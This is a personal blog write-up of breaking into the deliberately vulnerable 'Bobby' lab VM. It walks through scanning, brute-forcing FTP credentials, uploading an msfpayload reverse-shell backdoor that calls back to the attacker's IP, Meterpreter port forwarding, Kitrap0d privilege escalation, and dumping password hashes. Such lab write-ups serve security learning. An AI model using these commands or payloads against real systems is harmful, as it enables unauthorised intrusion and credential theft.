Bobby: Write-up

Hi there,

Quick blog post on the VM “Bobby” which is once of the nicest VM I did so far.

Discovery

The first step is always the same: discovering the machine on the network. To do so:

1
$ nmap -sV 192.168.1.1/24

I managed to retrieve the IP address: 192.168.1.11.

Let’s start to fingerprint the different services to exploit it.

Fingerprinting

Then, I used Nmap to retrieve the services running:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ nmap -sV 192.168.1.11

Starting Nmap 6.46 ( http://nmap.org ) at 2014-05-15 20:54 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     Microsoft ftpd
80/tcp  open   http    Microsoft IIS httpd 5.1
443/tcp closed https
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds

Using Nikto as well:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ./nikto.pl -h http://192.168.1.11
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.1.11
+ Target Hostname:    192.168.1.11
+ Target Port:        80
+ Start Time:         2014-05-15 20:56:29 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/5.1
+ Server leaks inodes via ETags, header found with file /, fields: 0x20b456b8599ce1:a02 
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, PUT, DELETE 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /localstart.asp: This may be interesting...
+ 6544 items checked: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2014-05-15 20:56:50 (GMT2) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The page localstart.asp was asking some credentials but unfortunately I didn’t have them.

I also used DirBuster but I couldn’t find relevant files/directories.

I decided to target the FTP Server. I checked if there was an anonymous access on the FTP but there was none. Unfortunately.

Based on the Web Application I decided to create some custom Wordlist because I didn’t have any clue on what kind of password it could have been .

I used the awesome tool Wyd that extracts single words/strings in some files.

To do so:

1
wget http://192.168.1.11 -O bobby.html

And then :

1
./wyd.pl -o bobby.txt bobby.html

The output is:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
TheXero-01
Bobby's
blog
Welcome
to
my
personal
blogging
website
but
here
are
a
few
things
about
me
Favourite
film
Matrix
reloaded
music
artist
Daft
Punk
os
Windows
31
bobby

Moreover, I didn’t have any clue on the Username but thanks to the information we retrieved, I thought the username was something like:

1
2
3
4
5
6
7
8
Bobby
BOBBY
BOB
BoB
Bob
bob
BOb
...

After cracking it using Hydra, I was able to log in using those credentials: Bob/Matrix. Yay!

1
2
3
4
5
6
7
8
9
10
ftp> o
(to) 192.168.1.11
Connected to 192.168.1.11.
220 Microsoft FTP Service
Name (192.168.1.11:paul): Bob
331 Password required for Bob.
Password:
230 User Bob logged in.
Remote system type is Windows_NT.
ftp> 

Thanks to this access, I found a file called: hint.html:

*#1 This very common Windows file is not downloaded or interpretered but rather executed server side *

Exploitation

The scenario I have now is to create a reverse meterpreter backdoor, upload it, and execute it by getting to the page

1
http://192.168.1.11/backdoor.exe 

I created the payload using msfpayload:

1
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.68 LPORT=4444 X > /tmp/backdoor.exe

Then, I uploaded the backdoor, had a listener on port 4444 and got a meterpreter session. Good!

However, the meterpreter session stopped few mins later because of some timeout with the Web application”. I decided to :

  • Re-execute the backdoor by accessing the file through the Web server
  • Then, after getting the meterpreter session, execute it again: execute -f backdoor.exe
  • Go in backgroud, and restart a handler.

You need to do it fast enough to catch the connection. Otherwise, you’ll wait, and wait..

Then, I got this second meterpreter session and I was sure this would not terminate because of some timeout. It was time to get SYSTEM privileges!

Getting SYSTEM

The first attempt was to use getsystem but unfortunately, I didn’t have enough privileges. I couldn’t migrate to another process.

So, I decided to have a lot at all the processes, and services running on localhost which were not accessible from the outside. That’s where I found the Terminal Server.

I decided to add some route:

1
route add 127.0.0.1 255.255.255.0 2

I added a route that allowed me target the remote machine with the IP 127.0.0.1. The traffic was tunneled through the meterpreter’s session. Nice trick, like it.

Then, I portforwarded the Terminal Server port: 3389.

I did it like this: portfwd add -l 3389 -p 3389 -r 127.0.0.1

That allowed me to target the local port 3389 and will forward the whole traffic to the remote port 3389. Another nice trick I like with Meterpreter.

Thanks to this, I was able to use rdesktop and log in with Bob account (using password: Matrix). Then, I executed again the backdoor to get a proper user running the process.

I managed to retrieve another meterpreter’s session. I tried to use getsystem command again but no luck. However, I remember about an exploit called Kitrap0d.

I checked if it was still in Metasploit (I remember it was another method in getsystem) and I was able to use it. Linked it to my Meterpreter’s session and “VoilĂ !”, I got SYSTEM privileges. :–)

The metasploit module is: exploit/windows/local/ms10_015_kitrap0d.

Then, I was able to dump hashes from the system:

1
2
3
4
5
6
7
Administrator:500:921988ba001dc8e1e1c7c53891cb0efa:e1270db1dd8bf1e32725729695aa1feb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:887f24b0020b273cb90fe7c65f15ca55:c9ee87d435cfd6b9b824e7476e87ee23:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:904376a878474e83e38973eb591a30bf:::
bob:1003:66e5d5ae82299cb6aad3b435b51404ee:42865c72994c34e54d4c5d659fc15b10:::
IUSR_BOBBY:1004:cd15c852291896b9bcb0b504caf52a34:290a598ad6db348292cd06eeda96a626:::
IWAM_BOBBY:1005:2b726cbf313f69b4617d49f3866beaad:1dddcc00ab4bcbe9e21b767f8a9a4d9e:::

And then, I cracked the passwords (for fun) using John The Ripper and Administrator’s password was: P@SSW0RD12345.

I hope you liked the write-up which contains (in my opinion) funny tricks by adding some route, doing port forwarding, etc. Cheers and see you soon!

Copyright © 2017 - Paul A. (PaulSec). Powered by Octopress